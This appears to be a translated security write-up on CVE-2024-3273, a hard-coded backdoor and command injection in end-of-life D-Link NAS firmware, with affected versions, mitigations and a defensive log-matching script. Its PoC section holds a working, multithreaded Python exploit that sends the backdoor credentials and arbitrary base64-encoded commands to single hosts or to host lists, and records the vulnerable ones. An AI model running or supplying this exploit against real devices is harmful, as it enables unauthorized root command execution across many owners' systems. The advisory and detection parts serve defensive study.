1. Vulnerability

[Figure 1] https://nvd.nist.gov/vuln/detail/CVE-2024-3273

- An arbitrary command injection vulnerability affecting vulnerable firmware versions of several D-Link NAS products

Affected versions
- DNS-320L version 1.11, version 1.03.0904.2013, version 1.01.0702.2013
- DNS-325 version 1.01
- DNS-327L version 1.09, version 1.00.0409.2013
- DNS-340L version 1.08

[Figure 2] Vulnerable D-Link NAS devices exposed to the internet [2]

2. Vulnerability details [2]

- The vulnerability lies in the /cgi-bin/nas_sharing.cgi endpoint

> /cgi-bin/nas_sharing.cgi is used as a backdoor: its hard-coded credentials let an unauthorized user access the system

> A GET request is sent to the endpoint with the user and passwd parameters together with the system parameter

① Backdoor: uses the hard-coded user and passwd parameters

② Command injection: uses the system parameter; the command is passed base64-encoded

GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=<BASE64_ENCODED_COMMAND_TO_BE_EXECUTED>

[Figure 3] Exploit result

3. PoC [3]

- Send a GET request to the cgi-bin/nas_sharing.cgi URL

> Set the user parameter to messagebus and the passwd parameter to an empty value

> Send the value of the system parameter base64-encoded

import requests
import base64
import threading

# Utility function for Base64 encoding
def encode_base64(command):
    return base64.b64encode(command.encode()).decode()

# Watermark banner
print("""
┏┓┓┏┏┓  ┏┓┏┓┏┓┏┓  ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛  ┗━┗┛┗━┗╋  ┗┛┗━ ╹┗┛
""")

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.1.153 Yowser/2.5 Safari/537.36",
    "Accept-Encoding": "identity"
}

# Use a session for requests
session = requests.Session()

# Lock for file writing
file_write_lock = threading.Lock()

def execute_command(host, command=None, print_response=True, export=True):
    if command is None:
        command = 'id'
    encoded_command = encode_base64(command)
    url = f"http://{host}/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={encoded_command}"

    try:
        response = session.get(url, headers=headers, timeout=10)
        if 'root' in response.text:
            # Append the host to vulnerables.txt only when export was requested
            if export:
                with file_write_lock:
                    with open('vulnerables.txt', 'a') as f:
                        f.write(host + '\n')
            print(f"Host {host} is vulnerable.")
        elif print_response:
            print(f"Response from {host}:")
            print(response.text)
    except requests.Timeout:
        print(f"Request timed out for host {host}.")
    except requests.ConnectionError:
        print(f"Connection error for host {host}.")
    except Exception:
        print(f"An error occurred for host {host}.")

def execute_command_multiple(file_path, export):
    with open(file_path, 'r') as file:
        threads = []
        for line in file:
            # Strip whitespace and a UTF-8 BOM that some editors prepend
            host = line.strip().replace("\ufeff", "")
            # Honor the export choice entered in main()
            thread = threading.Thread(target=execute_command, args=(host, None, False, export == 'y'))
            thread.start()
            threads.append(thread)

        # Wait for all threads to complete
        for thread in threads:
            thread.join()

def main():
    option = input("Choose an option (1: Single Host, 2: Multiple Hosts): ")

    if option == '1':
        host = input("Enter the host: ")
        command = input("Enter the command to run: ")
        execute_command(host, command)
    elif option == '2':
        file_path = input("Enter the file path containing hosts: ")
        export = input("Export vulnerable host to vulnerables.txt? (y/n): ").lower()
        execute_command_multiple(file_path, export)
    else:
        print("Invalid option.")

if __name__ == "__main__":
    main()

4. Mitigations

- The affected NAS products have reached EOL (End of Life) and are no longer supported devices

> The vendor recommends retiring the affected products and replacing them with products that still receive firmware updates [4]

- Apply a detection policy on security appliances

> cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd
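As an added, defender-side example (not code from the original post or from the referenced repositories), the following Python applies the detection pattern above to web-server or proxy access-log lines and decodes the base64 system parameter for analyst review. The log layout and the sample lines are constructed assumptions.

```python
import base64
import binascii
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic): client, request line, status.
SAMPLE_LOG = """\
203.0.113.5 "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1" 200
203.0.113.9 "GET /cgi-bin/nas_sharing.cgi?user=admin&passwd=secret&cmd=7 HTTP/1.1" 200
203.0.113.5 "GET /index.html HTTP/1.1" 200
198.51.100.2 "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=!!notbase64 HTTP/1.1" 500
"""

# Assumed log layout: client, quoted request line, status code.
LOG_RE = re.compile(r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_system_param(value):
    """Decode the base64 'system' value for analyst review; None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None

def match_cve_2024_3273(line):
    """Return an alert dict when the line matches the backdoor request signature, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/cgi-bin/nas_sharing.cgi"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    # Signature from the advisory: hard-coded user "messagebus" with an empty passwd
    if qs.get("user") != ["messagebus"] or qs.get("passwd") != [""]:
        return None
    encoded = qs.get("system", [None])[0]
    return {
        "client": m.group("client"),
        "status": m.group("status"),
        "cmd": qs.get("cmd", [None])[0],
        "system_b64": encoded,
        "system_decoded": decode_system_param(encoded) if encoded is not None else None,
    }

def scan_log(text):
    """Run the signature over every line and return the alerts in order."""
    return [a for a in map(match_cve_2024_3273, text.splitlines()) if a]
```

Matching on the parsed query rather than a raw substring keeps the rule stable when parameters are reordered or percent-encoded, and a request whose system value fails to decode is still reported.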

 

5. References

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-3273
[2] https://github.com/netsecfish/dlink?tab=readme-ov-file
[3] https://github.com/adhikara13/CVE-2024-3273
[4] https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383
[5] https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/
[6] https://www.boannews.com/media/view.asp?idx=128614&page=4&kind=1
